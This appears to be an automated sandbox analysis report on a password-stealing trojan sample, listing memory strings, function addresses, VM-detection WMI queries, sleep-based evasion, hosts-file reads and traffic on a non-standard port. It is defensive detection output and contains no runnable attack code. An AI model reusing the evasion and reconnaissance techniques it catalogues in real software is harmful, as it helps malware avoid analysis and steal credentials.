                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://wtfismyip.com/text
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269668764.000000000070A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00408C601_2_00408C60
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040DC111_2_0040DC11
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00407C3F1_2_00407C3F
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00418CCC1_2_00418CCC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00406CA01_2_00406CA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004028B01_2_004028B0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004182441_2_00418244
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004016501_2_00401650
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402F201_2_00402F20
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004193C41_2_004193C4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004187881_2_00418788
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402F891_2_00402F89
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402B901_2_00402B90
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004073A01_2_004073A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024F16381_2_024F1638
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FC9D01_2_024FC9D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FF2E01_2_024FF2E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_051008E31_2_051008E3
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278243802.00000000077B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206914545.0000000000789000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278226031.00000000077A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278274277.00000000077C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmiutils.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278368604.0000000007800000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.277892249.0000000006E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_rc.dllT vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeBinary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: Section: .rsrc ZLIB complexity 0.988744491186
                      Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@1/21@3/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile created: C:\Users\user\AppData\Local\Temp\tmp76A9.tmpJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCommand line argument: 08A1_2_00413780
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeVirustotal: Detection: 74%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeMetadefender: Detection: 27%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: real checksum: 0x23bfb should be: 0x45256
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FD0C1 pushad ; iretd 1_2_024FD101
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0510EC7A push 8B0876FFh; retf 1_2_0510EC7F

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 3214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWindow / User API: threadDelayed 2750Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWindow / User API: threadDelayed 5689Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe TID: 6964Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware_KWC4Y56Win32_VideoControllerAXZNRU94VideoController120060621000000.000000-00026994397display.infMSBDAUCR_NBGZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP7N5LX5Al
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpBinary or memory string: VMWare
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
